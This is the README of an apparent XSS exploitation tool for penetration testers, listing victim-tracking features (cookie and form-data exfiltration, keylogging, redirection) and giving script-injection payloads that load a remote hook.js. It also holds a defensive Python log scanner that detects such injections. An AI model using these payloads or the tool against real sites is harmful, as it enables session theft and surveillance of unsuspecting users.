Sharpforce/XSS-Exploitation-Tool

XSS Exploitation Tool

XSS Exploitation Tool (XET) is a penetration testing tool designed to exploit Cross-Site Scripting vulnerabilities.


🧩 Features

  • Technical data about the victim's browser
  • Geolocation of the victim
  • Snapshot of the hooked/visited page
  • Source code of the hooked/visited page
  • Exfiltrate input field data
  • Exfiltrate cookies
  • Keylogging
  • Display alert box
  • Redirect user
  • Visualisation mode

🚀 Installation

Copy the .env.example file to .env and adjust the values as needed.

REMOTE_* variables define the address and port through which the victim communicates with the server (to load the hook or to communicate via WebSocket).

SSL_ENABLED determines whether the server should run with HTTPS enabled.
Make sure to change all default passwords and keys for your environment.

If SSL_ENABLED=true, you must provide a certificate and private key at the following paths:

/app-xet/certs/certificate/apache-certificate.crt
/app-xet/certs/private_key/apache-private.key

You can generate your own certificate with the following command:

openssl req -x509 -newkey rsa:4096 -nodes \
  -keyout apache-private.key \
  -out apache-certificate.crt \
  -days 365 \
  -subj "/CN=127.0.0.1"

Place the generated files in the appropriate folders.

Start the Docker environment:

$ docker-compose up -d

🛠️ How it works

The server itself is available at http://127.0.0.1:8000.

Using the demo application

The demo application already includes the call to the malicious script hook.js.

To access it, simply visit http://127.0.0.1:8088.

Using your own vulnerable application

If you are not using the provided demo app, you can inject the hook with:

?vulnerable_param=<script src="http://127.0.0.1:8000/hook.js"></script>
?vulnerable_param=<script src="https://127.0.0.1:8443/hook.js"></script>
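
On the defensive side, the injection requests shown above leave a recognisable trace in the target application's access log. The following Python sketch is an added example and not part of XET: it flags query parameters that carry a `<script src=...>` tag pointing at a host:port other than the application's own. The log format, the `/` path, the `q` parameter and the `/js/app.js` script are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request target inside a common/combined access-log line (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A <script ... src=...> tag; group 1 is the src value.
SCRIPT_SRC = re.compile(r"<\s*script\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_script_injections(request_target, own_origins):
    """Return (param, src) for query parameters carrying a <script src=...>
    tag whose host:port is not one of the application's own origins."""
    hits = []
    for name, value in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        for src in SCRIPT_SRC.findall(fully_decode(value)):
            try:
                origin = urlsplit(src).netloc.lower()
            except ValueError:  # malformed authority: report it anyway
                origin = "<unparseable>"
            if origin and origin not in own_origins:
                hits.append((name, src))
    return hits

def scan(lines, own_origins):
    """Return (line_number, param, src) for every suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits = find_script_injections(match.group(1), own_origins)
            findings += [(number, name, src) for name, src in hits]
    return findings

# Constructed sample lines (not captured traffic); the "/" path is an assumption.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2025:10:00:00 +0000] "GET /?vulnerable_param=hello HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2025:10:00:05 +0000] "GET /?vulnerable_param=%3Cscript%20src%3D%22http%3A%2F%2F127.0.0.1%3A8000%2Fhook.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 640',
    '127.0.0.1 - - [01/Jan/2025:10:00:09 +0000] "GET /?vulnerable_param=%253Cscript%2520src%253D%2522https%253A%252F%252F127.0.0.1%253A8443%252Fhook.js%2522%253E%253C%252Fscript%253E HTTP/1.1" 200 640',
    '127.0.0.1 - - [01/Jan/2025:10:00:12 +0000] "GET /?q=%3Cscript%20src%3D%22%2Fjs%2Fapp.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, {"127.0.0.1:8088"}):
        print(finding)
```

The check only inspects the query string, so payloads delivered in request bodies or stored server-side need a separate control such as a Content-Security-Policy that restricts `script-src`.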

⚠️ Disclaimer

This tool is intended for educational and research purposes only and must be used exclusively in authorized penetration testing environments. Unauthorized access or testing of systems you do not own or have explicit permission to assess is illegal. The author is not responsible for any misuse of this tool.

📄 License

This project is licensed under the GPL-3.0.